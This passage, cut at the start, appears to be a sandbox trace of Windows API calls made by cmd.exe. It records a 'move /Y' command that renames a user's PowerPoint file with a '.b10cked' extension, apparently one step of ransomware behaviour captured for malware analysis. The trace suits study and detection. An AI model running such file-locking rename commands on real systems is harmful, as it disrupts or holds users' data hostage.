lpBuffer=0x1afacc*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.112] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afacc, dwLength=0x1c | out: lpBuffer=0x1afacc*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.112] GetConsoleOutputCP () returned 0x1b5 [0235.112] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.112] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.112] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.112] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.113] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.113] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.113] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.113] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.113] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.113] GetEnvironmentStringsW () returned 0x310198* [0235.113] FreeEnvironmentStringsW (penv=0x310198) returned 1 [0235.113] GetEnvironmentStringsW () returned 0x310198* [0235.114] FreeEnvironmentStringsW (penv=0x310198) returned 1 [0235.114] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea6c | out: phkResult=0x1aea6c*=0x40) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0xc0, 
lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x1, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x1, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x0, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x40, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x40, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x40, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegCloseKey (hKey=0x40) returned 0x0 [0235.114] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea6c | out: phkResult=0x1aea6c*=0x40) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x40, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegQueryValueExW (in: 
hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x1, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x1, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x0, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x9, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x4, lpData=0x1aea78*=0x9, lpcbData=0x1aea70*=0x4) returned 0x0 [0235.114] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea74, lpData=0x1aea78, lpcbData=0x1aea70*=0x1000 | out: lpType=0x1aea74*=0x0, lpData=0x1aea78*=0x9, lpcbData=0x1aea70*=0x1000) returned 0x2 [0235.114] RegCloseKey (hKey=0x40) returned 0x0 [0235.114] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.114] srand (_Seed=0x5b8863c2) [0235.114] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"" [0235.115] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"" [0235.115] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.115] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3118f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.115] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.115] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.115] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.115] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.115] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.115] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.115] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.115] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.115] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.115] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.115] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.115] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.116] GetEnvironmentStringsW () returned 0x3122e8* [0235.116] FreeEnvironmentStringsW (penv=0x3122e8) returned 1 [0235.116] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.116] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.116] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.116] 
_wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.116] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.116] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.116] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.116] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.116] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.116] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.116] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af838 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af838, lpFilePart=0x1af834 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af834*="Desktop") returned 0x18 [0235.116] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.116] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af5b4 | out: lpFindFileData=0x1af5b4) returned 0x310028 [0235.116] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0235.117] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af5b4 | out: lpFindFileData=0x1af5b4) returned 0x310028 [0235.117] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0235.117] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af5b4 | out: lpFindFileData=0x1af5b4) returned 0x310028 [0235.117] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0235.117] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.117] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.117] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.117] GetEnvironmentStringsW () returned 0x312b08* [0235.117] FreeEnvironmentStringsW (penv=0x312b08) returned 1 [0235.117] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.118] GetConsoleOutputCP () returned 0x1b5 [0235.118] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.118] GetUserDefaultLCID () returned 0x409 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af978, cchData=128 | out: lpLCData="0") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af978, cchData=128 | out: lpLCData="0") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af978, cchData=128 | out: lpLCData="1") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.119] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.119] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.119] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.120] GetConsoleTitleW (in: lpConsoleTitle=0x3008f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.120] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.120] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.120] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.120] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.121] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.121] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.121] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.121] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.121] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.121] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.121] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.124] GetConsoleTitleW (in: lpConsoleTitle=0x1af670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.124] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.124] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0235.124] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.124] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0235.124] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.124] _wcsicmp 
(_String1="move", _String2="REN") returned -5 [0235.124] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.124] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.124] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.124] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.124] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.124] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.124] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.124] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.124] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.124] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.124] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.124] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.124] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.124] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.124] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.124] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.124] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.124] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.124] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0235.124] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.125] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.125] _wcsicmp (_String1="move", _String2="START") returned -6 [0235.125] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.125] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0235.125] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.126] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.126] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.126] GetVolumeInformationW (in: lpRootPathName="C:\\", 
lpVolumeNameBuffer=0x1af42c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af424, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af424*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.128] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.128] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.128] _wcsicmp (_String1="UFL3TY~1.PPT", _String2=".") returned 71 [0235.128] _wcsicmp (_String1="UFL3TY~1.PPT", _String2="..") returned 71 [0235.128] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3ty~1.ppt")) returned 0x20 [0235.128] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x311e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.128] SetErrorMode (uMode=0x0) returned 0x0 [0235.128] SetErrorMode (uMode=0x1) returned 0x0 [0235.129] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", nBufferLength=0x104, 
lpBuffer=0x1aedb4, lpFilePart=0x1aed9c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", lpFilePart=0x1aed9c*="UFL3TY~1.PPT") returned 0x2f [0235.129] SetErrorMode (uMode=0x0) returned 0x1 [0235.129] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0235.129] _wcsicmp (_String1="UFL3TY~1.PPT", _String2=".") returned 71 [0235.129] _wcsicmp (_String1="UFL3TY~1.PPT", _String2="..") returned 71 [0235.129] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3ty~1.ppt")) returned 0x20 [0235.129] SetErrorMode (uMode=0x0) returned 0x0 [0235.129] SetErrorMode (uMode=0x1) returned 0x0 [0235.129] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", nBufferLength=0x104, lpBuffer=0x1af230, lpFilePart=0x1aefc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", lpFilePart=0x1aefc8*="UFL3TY~1.PPT") returned 0x2f [0235.129] SetErrorMode (uMode=0x0) returned 0x1 [0235.129] SetErrorMode (uMode=0x0) returned 0x0 [0235.129] SetErrorMode (uMode=0x1) returned 0x0 [0235.129] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x1af438, lpFilePart=0x1aefc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked", lpFilePart=0x1aefc8*="UFl3tyKJKu.ppt.b10cked") returned 0x39 [0235.129] SetErrorMode (uMode=0x0) returned 0x1 [0235.129] SetLastError (dwErrCode=0x0) [0235.129] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3tykjku.ppt.b10cked")) returned 0xffffffff [0235.129] GetLastError () returned 0x2 [0235.129] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", fInfoLevelId=0x1, 
lpFindFileData=0x1ae944, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae944) returned 0x300eb0 [0235.130] FindNextFileW (in: hFindFile=0x300eb0, lpFindFileData=0x1ae944 | out: lpFindFileData=0x1ae944) returned 0 [0235.130] GetLastError () returned 0x12 [0235.130] FindClose (in: hFindFile=0x300eb0 | out: hFindFile=0x300eb0) returned 1 [0235.131] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x311c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x311c08) returned 0x300eb0 [0235.131] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked", lpFilePart=0x0) returned 0x39 [0235.131] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt", nBufferLength=0x104, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt", lpFilePart=0x0) returned 0x31 [0235.131] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3tykjku.ppt")) returned 0x20 [0235.131] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3tykjku.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3tykjku.ppt.b10cked"), dwFlags=0x3) returned 1 [0235.132] FindClose (in: hFindFile=0x300eb0 | out: hFindFile=0x300eb0) returned 1 [0235.384] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aeb90 | out: _Buffer=" 1") returned 9 [0235.384] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.384] GetFileType 
(hFile=0x7) returned 0x2 [0235.384] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.384] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aeb1c | out: lpMode=0x1aeb1c) returned 1 [0235.384] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.384] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aeb50 | out: lpConsoleScreenBufferInfo=0x1aeb50) returned 1 [0235.384] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.385] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x1aeb90 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.385] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aeb74, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x1aeb74*=0x1a) returned 1 [0235.385] _get_osfhandle (_FileHandle=1) returned 0x7 